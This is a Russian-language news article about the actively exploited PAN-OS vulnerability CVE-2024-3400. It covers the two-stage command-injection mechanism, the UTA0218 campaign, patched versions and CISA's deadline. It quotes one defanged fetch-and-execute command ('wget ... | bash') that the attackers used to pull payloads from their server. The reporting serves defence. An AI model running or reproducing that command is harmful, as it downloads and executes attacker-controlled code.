Palo Alto Networks поделилась более подробной информацией о критическом недостатке безопасности, влияющем на PAN-OS, который активно используется злоумышленниками.
Компания описала уязвимость, отслеживаемую как CVE-2024-3400 (оценка CVSS: 10.0), как "сложную" и представляющую собой комбинацию двух ошибок в версиях программного обеспечения PAN-OS 10.2, PAN-OS 11.0 и PAN-OS 11.1.
"В первом случае служба GlobalProtect недостаточно проверила формат идентификатора сеанса перед их сохранением. Это позволило злоумышленнику сохранить пустой файл с выбранным злоумышленником именем файла", - сказал Чандан Б. Н., старший директор по безопасности продуктов Palo Alto Networks.
"Вторая ошибка (уверенность в том, что файлы были сгенерированы системой) использовала имена файлов как часть команды".
Стоит отметить, что, хотя ни одна из проблем не является достаточно критичной сама по себе, в совокупности они могут привести к выполнению удаленной команды командной строки без проверки подлинности.
Компания Palo Alto Networks заявила, что исполнитель угрозы, стоящий за использованием уязвимости в течение нулевого дня, UTA0218, провел двухэтапную атаку, чтобы добиться выполнения команд на уязвимых устройствах. Активность отслеживается под названием Операция MidnightEclipse.
Как ранее сообщали Volexity и собственное подразделение компании сетевой безопасности 42 threat intelligence division, это включает отправку специально созданных запросов, содержащих команду для выполнения, которая затем запускается через бэкдор под названием UPSTYLE.
"Первоначальная настройка механизма сохранения с помощью UTA0218 включала настройку задания cron, которое использовало бы wget для извлечения полезной нагрузки из URL-адреса, контролируемого злоумышленником, при этом его выходные данные записывались в стандартный вывод и передавались в bash для выполнения", - отметили Volexity на прошлой неделе.
"Злоумышленник использовал этот метод для развертывания и выполнения определенных команд и загрузки инструментов обратного прокси, таких как GOST (GO Simple Tunnel)".
Подразделение 42 заявило, что не смогло определить команды, выполняемые с помощью этого механизма – wget -qO- hxxp: // 172.233.228 [.]93 /policy | bash – но оценило, что имплантат cron на основе заданий, вероятно, используется для выполнения действий после эксплуатации.
"На этапе 1 злоумышленник отправляет в GlobalProtect тщательно разработанную команду командной строки вместо действительного идентификатора сеанса", - объяснил Чандан. "Это приводит к созданию в системе пустого файла со встроенной командой в качестве имени файла, выбранного злоумышленником".
"На этапе 2 ничего не подозревающее запланированное системное задание, которое выполняется регулярно, использует в команде имя файла, предоставленное злоумышленником. Это приводит к выполнению предоставленной злоумышленником команды с повышенными привилегиями".
Хотя Palo Alto Networks изначально отметила, что для успешной эксплуатации CVE-2024-3400 требуются конфигурации брандмауэра для шлюза GlobalProtect или портала GlobalProtect (или обоих) и включена телеметрия устройства, с тех пор компания подтвердила, что телеметрия устройства не имеет отношения к проблеме.
Это основано на новых выводах компании Bishop Fox, которая обнаружила обходные пути для использования уязвимости таким образом, что для проникновения на устройство не требовалось включать телеметрию.
За последние несколько дней компания также расширила исправления для этой ошибки, включив в нее другие часто используемые версии для технического обслуживания -
- PAN-OS 10.2.9-h1
- PAN-OS 10.2.8-h3
- PAN-OS 10.2.7-h8
- PAN-OS 10.2.6-h3
- PAN-OS 10.2.5-h6
- PAN-OS 10.2.4-h16
- PAN-OS 10.2.3-h13
- PAN-OS 10.2.2-h5
- PAN-OS 10.2.1-h2
- PAN-OS 10.2.0-h3
- PAN-OS 11.0.4-h1
- PAN-OS 11.0.4-h2
- PAN-OS 11.0.3-h10
- PAN-OS 11.0.2-h4
- PAN-OS 11.0.1-h4
- PAN-OS 11.0.0-h3
- PAN-OS 11.1.2-h3
- PAN-OS 11.1.1-h1
- PAN-OS 11.1.0-h3
Агентство кибербезопасности и инфраструктуры США (CISA) также добавило этот недостаток в свой каталог известных эксплуатируемых уязвимостей (KEV), приказав федеральным агентствам обезопасить свои устройства до 19 апреля 2024 года.
Согласно информации, предоставленной Фондом Shadowserver Foundation, приблизительно 22 542 подключенных к Интернету брандмауэрных устройства, вероятно, уязвимы для CVE-2024-3400. По состоянию на 18 апреля 2024 года большинство устройств находятся в США, Японии, Индии, Германии, Великобритании, Канаде, Австралии, Франции и Китае.
